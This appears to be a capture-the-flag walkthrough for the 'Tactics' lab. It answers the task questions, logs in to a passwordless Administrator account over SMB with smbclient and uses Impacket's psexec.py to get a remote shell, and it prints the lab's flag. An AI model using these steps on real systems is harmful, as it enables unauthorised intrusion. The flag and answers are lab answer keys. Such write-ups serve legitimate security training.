# Tactics {% file src="" %} **Task 1: Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall?** * The `-Pn` flag will treat all hosts as online and not ping the Target IP Address. **Task 2: What does the 3-letter acronym SMB stand for?** * Sever Message Block **Task 3: What port does SMB use to operate at?** * 445 **Task 4: What command line argument do you give to `smbclient` to list available shares?** * Input the command smbclient into the terminal to see the list of options and flags:

* `-L` will list out the shares. **Task 5: What character at the end of a share name indicates it's an administrative share?** * Start by logging into the IP with `sbmclient` ``` smbclient -L [Target IP] -U Administrator ``` * Try logging into the administrator account first as it is the highest privileged account in Microsoft. * When prompted for a password, just hit enter as it is a passwordless account. * ```

``` * This will display the shares available. * At the end of each Share is a "$" symbol. **Task 6: Which Administrative share is accessible on the box that allows users to view the whole file system?** * Generally speaking the C Drive contains all of the system files in a Windows OS. **Task 7: What command can we use to download the files we find on the SMB Share?** * Start by accessing some of the shares. You can do this with the following commands: ``` smbclient \\\\[Target IP]\\[Share Name] -U Administrator ``` * You will be prompted for a password depending on the account. In this case, the Administrator account is passwordless so you can just hit enter. * You can then type in `help` to see what commands are available. * ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2F17P5UgJ8bwxVcDwYfjok%2Fimage.png?alt=media\&token=179ef88a-ae61-4c02-a307-f9a92d679f14) * In this case, the answer is `get`. Similar to Linux. **Task 8: Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?** * Googling this you can discover that a psexec.py tool is a Python tool part of the IMPACKET Module that allows you to gain a fully interactive shell on a Windows system. **Capture the Flag:** * Switch to the C$ Share for common directories on the system. You can use the same command from above. * Once in the C$ Share, redirect to the C$\Users\Administrator\Desktop\ directory to find the flag. * f751c19eda8f61ce81827e6930a1f40c **Alternate Means to the Flag with IMPACKET:** * Start by downloading Impacket to your host machine. ``` git clone https://github.com/SecureAuthCorp/impacket.git ``` * cd into the impacket directory ``` cd impacket ``` * Setup impacket: ``` sudo python3 setup.py install ``` * Check to make sure you have all of the requirements installed: ``` pip3 install -r requirements.txt ``` * Check out the options for psexec.py with the following: ``` psexec.py -h ``` ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2Fy0fsYI7ORrn9p46aeH4T%2Fimage.png?alt=media\&token=55c52083-4926-48a3-b22a-f4cb6e727106) * psexec.py is located in the `/impacket/example/` directory. * Next is to use the tool to gain an interactive shell with the windows target: ``` python3 psexec.py username:password@[Target IP] ``` * Since the Administrator's account is passwordless, we will just use the following: ``` python3 psexec.py administrator@[Target IP] ```